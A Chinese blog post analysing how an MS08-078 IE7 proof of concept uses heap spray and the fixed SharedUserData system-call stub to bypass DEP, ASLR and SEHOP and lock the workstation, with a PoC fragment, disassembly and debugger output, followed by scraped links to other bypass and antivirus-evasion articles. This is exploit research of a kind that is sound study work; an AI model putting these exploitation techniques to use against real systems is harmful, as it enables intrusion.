How to Bypass DEP+ASLR+SEHOP

最新推荐文章于 2024-11-14 10:43:41 发布
最新推荐文章于 2024-11-14 10:43:41 发布
阅读量612 收藏
点赞数
分类专栏: exploit
本文通过分析MS08-078 IE7漏洞,详细解释了如何利用该漏洞绕过Windows系统的DEP、ASLR及SEHOP等安全保护机制,并以锁屏操作为例展示了攻击原理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

昨天去SSCON2009听TK讲了一个议题"安全漏洞的下一个十年",佩服TK的演讲的幽默风趣,MS一个

非常具有忽悠的议题讲的很生动,精彩,再次膜拜下,我个人觉得里面最精彩部分就在如下了,呵呵,

通过MS08-078这个去年的IE7的漏洞来介绍如何绕过windows现有的安全保护机制,很是受启发,因为

TK只有一张PPT的介绍,我在此想展开介绍的更详细点,和大家分享一下TK的研究成果:),未经TK

的同意,在此还要感谢下TK:)

我去年分析过这个漏洞,现在让我们看看,到底是如果绕过windows现有的DEP,ALSR,SEHOP这些安全

保护机制的。

if(wxp||w2k3)document.write(
'<XML ID=I><X><C>
<![CDATA[<image SRC=http:// C8;ਊ.book.com src=http://www.google.com]]>
<![CDATA[>]]></C></X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>

漏洞细节就不介绍了,构造如此数据在这个Poc中

0x0a0a11c8

通过Heap spray在内存中填充0x7ffe027c这个值,为什么要填充如下值,下面会作介绍。


mshtml.dll CXfer::TransferFromSrc(void)
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18 ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18 ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg = VARIANTARG ptr -18h
.text:461E3D18 var_8 = dword ptr -8
.text:461E3D18 var_4 = dword ptr -4
.text:461E3D18
.text:461E3D18 mov edi, edi
.text:461E3D1A push ebp
.text:461E3D1B mov ebp, esp
.text:461E3D1D sub esp, 18h
.text:461E3D20 push ebx
.text:461E3D21 push esi
.text:461E3D22 mov esi, ecx
.text:461E3D24 xor ebx, ebx
.text:461E3D26 test byte ptr [esi+1Ch], 9
.text:461E3D2A jnz loc_461E3E2E

.text:461E3D30 mov eax, [esi] //eax==0x0a0a11c8
.text:461E3D32 cmp eax, ebx
.text:461E3D34 jz loc_461E3E29
.text:461E3D3A cmp [esi+4], ebx
.text:461E3D3D jz loc_461E3E29
.text:461E3D43 cmp [esi+8], ebx
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84], 换句话说就是call

[0x7ffe0300], 这是SharedUserData!SystemCallStub指针,这个指针里面存放着用户态进入内核态

ntdll!KiFastSystemCall函数的地址,也就是任何内核系统服务调用都会通过这个函数进入内核。

this call request for native API.// this call like call NtUserLockWorkStation for lock the windows:)


0:000> dd SharedUserData!SystemCallStub
7ffe0300 7c828608 7c82860c 00000000 00000000
7ffe0310 00000000 00000000 00000000 00000000
7ffe0320 00d2c763 00000000 00000000 00000000
7ffe0330 71724108 00000000 00000000 00000000
7ffe0340 00000000 00000000 00000000 00000000
7ffe0350 00000000 00000000 00000000 00000000
7ffe0360 00000000 00000000 00000000 00000000
7ffe0370 00000000 00000000 00000000 00000000

0:000> u 7c828608
ntdll!KiFastSystemCall:
7c828608 8bd4 mov edx,esp
7c82860a 0f34 sysenter
ntdll!KiFastSystemCallRet:


我们再看看这个0x11c8这个值构造的用意,先让我们看看锁屏函数NtUserLockWorkStation,也就是直接

调用这个函数就是会实现锁屏功能。

0:000> u 773ddd0d
USER32!NtUserLockWorkStation:
773ddd0d b8c8110000 mov eax,11C8h //
773ddd12 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
773ddd17 ff12 call dword ptr [edx]
773ddd19 c3 ret

我们再看看这个ie7的漏洞的片断
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8//这里的实现是不是跟NtUserLockWorkStation很
相似
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84]

也许大家会问NtUserLockWorkStation的代码片断是mov eax,0x11c8,而上面的代码的eax是0x0a0a11c8,

事实在内核中处理过程,来通过传入的eax的值来判断是哪个服务调用,其实只用了低两个字节,所以

0x0a0a11c8可以忽略高两个字节,对服务调用结果不影响,所以完全可以当成是执行了锁屏操作。

结论:

1.通过Heap spray注入内存的构造的数据绕过DEP,因为没有在堆上执行代码

2.绕过ASLR,是因为内核服务调用的入口地址是不会变化的,只要能够构造相应的内核调用需要用到的

参数,就可以执行类似这样的shellcode,但是局限性也很明显了,因为这样构造出来的shellcode功能很

有限,就像TK演示的那样,制造了一个锁屏的操作。

3.利用起来非常困难,但就理论上就对抗windows的这些安全保护机制,算是绕过了,呵呵:)

写的匆忙,多多包涵,再次感谢TK提供的这种想法:)

[网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
DEP bypass
samohyes的博客
09-26 418
Because I am using Ubuntu in English so I can't type chinese now. But here is a useful paper about bypassing DEP. I will put it here and polish this blog later.
MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习
瞎几把学
12-11 1521
<br />标 题: 【原创】MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习<br />作 者:parachaos<br />时 间: 2009-02-09,12:32:46<br />链 接: http://bbs.pediy.com/showthread.php?t=81667<br /><br />【题目】一种在windows xp sp2 chs 和windows xp sp3 chs 系统中通用的能够bypass DEP的利用MS08-067漏洞缓冲区溢出的栈帧构造方法的学
内核模式和用户模式的切换
内心的宁静带给我们力量。
01-22 3617
32位x86系统,每个进程的空间是4GB,即地址0x00000000到0xFFFFFFFF。 为了高效调用,Windows会把操作系统的内核数据和代码映射的系统中所有进程的进程空间中。因此4GB空间被划分为两个区域:用户空间和系统空间,默认大小为各2GB。 为了保护映射到进程空间的系统代码和数据,Windows提供了权限控制机制。也就是两种访问模式:用户模式和内核模式。 处理器在硬件一级保证
DEPASLR技术概览及应用
weixin_42605397的博客
11-14 959
本文还有配套的精品资源,点击获取 简介:DEP(数据执行防护)和ASLR(地址空间布局随机化)是提高计算机系统安全性的关键技术,能够有效防御恶意软件和缓冲区溢出攻击。DEP防止代码注入,而ASLR通过随机化内存布局增加攻击难度。这两种技术在现代操作系统中广泛应用,并通常与其它安全机制协同工作,以提供多层次的安全保护。 1. DEPASLR的简介与作用 在现...
How to bypass Excel VBA Project password - accepted answer on Stackoverflow.mkv
11-04
How to bypass Excel VBA Project password - accepted answer on Stackoverflow.mkv
Jump Over ASLR - Attacking Branch Predictors to Bypass ASLR - 2016 (micro16)-计算机科学
04-22
Attacking Branch Predictors to Bypass ASLRDmitry Evtyushkin Department of Computer ScienceState University of New York at Binghamtondevtyushkin@cs.binghamton.eduDmitry Ponomarev Department of Computer...
分析如何通过暴破方式bypass ASLR
热门推荐
softgmx的博客
08-30 1万+
名词说明: No-eXecutable bit (NX), address space layout randomization (ASLR) and stack smashing protector (SSP) 实现环境 本案例在我的centos 64位(内核版本3.1)同时bypass NX、ASLR、SSP保护 漏洞利用的分析过程 //通过暴力破解,拿到漏洞的偏移量、SSP的c...
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
本文探讨的技术涉及两个关键工具:Invoke-Obfuscation-Bypass 和 PS2EXE,它们是针对PowerShell脚本进行混淆和转换为可执行文件(exe)的方法,以规避主流杀毒软件的检测。 Invoke-Obfuscation 是一个 PowerShell ...
信息安全_数据安全_Multifactored Auth Bypass How to.pdf
08-22
然而,"Multifactored Auth Bypass How to"的主题揭示了MFA并非无懈可击,它存在多种可能的绕过策略,这给数据恢复和整体安全防护带来了挑战。 首先,我们需要理解为什么需要MFA。MFA的目的是增加攻击者突破防线的...
DEPASLR的原理与破解
wangjiabin2007的专栏
07-10 6323
DEP原理就是在系统的内存页中设置了一个标志位,标示这个内存页的属性(可执行),硬件和系统级支持。 ASLR 原理同一个程序运行时,其相同模块的加载地址是随机的,不是固定在某个地址上。 DEP的绕过(破解)方法。
DEP/ASLR 原理及攻击
forevertingting的博客
08-10 4721
ASLR DEP
DEP/SEHOP/ASLR
cs74184235的博客
09-06 1054
 微软的安全开发生命周期(SDL)已经实施了十年了。这段时间里发生了很大的变化。在过去的十年中,互联网使用人口已经由约3亿5千万增长到超过24亿。现在,开发人员的机会比以往任何时候都要多。Windows 8仍然相对较新,云尚处于采用的早期阶段,而新型的移动设备和平台已经出现了迅猛发展。虽然互联网创造了许多处理业务的全新机会和方法,但是它也为网络犯罪创造了地下温床。安全漏洞所引发的财务问题
BypassDEP(数据执行保护)
weixin_45012273的博客
02-17 1120
介绍 DEP的主要作用是阻止数据页(默认的堆,栈以及内存池页)执行代码。用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时, 程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 Vs设置DEP 在使用VS编译的时候也有DEP选项。(VS2019示例)默认情况下是开启的。 通过右键单击项目属性–>链接器–>高级–>DEP保护。 目标程序 //******
DEP&栈保护&ASLR 开启关闭
zhuoyang111的博客
06-07 7231
判断ASLR是否打开,输出2表示打开 关闭ASLR,切换至root用户,输入命令 echo 0 > /proc/sys/kernel/randomize_va_space 开启ASLR,切换至root用户,输入命令 echo 2 > /proc/sys/kernel/randomize_va_space gcc编译时,关闭DEP和栈保护,-fno-st
750W高PF值充电机电源方案:基于UCC28070、ST6599和PIC16F193X的设计与实现
最新发布
08-08
750W高功率因数(PF)充电机电源设计方案,采用TI公司的UCC28070作为交错式PFC控制器,ST公司ST6599用于LLC谐振变换,以及Microchip的PIC16F193X作为主控芯片。文中不仅提供了详细的原理图、设计文件和烧录程序,还分享了实际调试经验和技术细节。具体来说,PFC环节通过优化乘法器补偿和电流环参数实现了极高的PF值;LLC部分则着重于死区时间和谐振腔参数的精确配置;单片机部分负责状态管理和故障保护等功能。最终方案实测效率达到94%,相比传统方案节能显著。 适合人群:电力电子工程师、硬件开发者、嵌入式系统设计师,特别是对高效电源设计感兴趣的读者。 使用场景及目标:适用于需要设计高性能、高效率充电机的企业和个人开发者。目标是在满足高功率因数的同时,提高转换效率并降低能耗。 其他说明:附带完整的原理图、设计文件和烧录程序,有助于读者快速上手并进行实际项目开发。同时引用了华南理工大学硕士学位论文的相关理论支持,使方案更具权威性和可靠性。
JAVA控制台命令详解.pdf
08-08
JAVA控制台命令详解
MAC should be bypass to support this feature.
01-21
### 绕过MAC地址限制实现特定功能支持 在探讨如何绕过MAC地址限制来实现特定功能之前,重要的是理解为何存在这样的需求以及可能的技术方案。 #### 使用虚拟网络接口卡(vNIC) 创建额外的虚拟网络接口卡是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值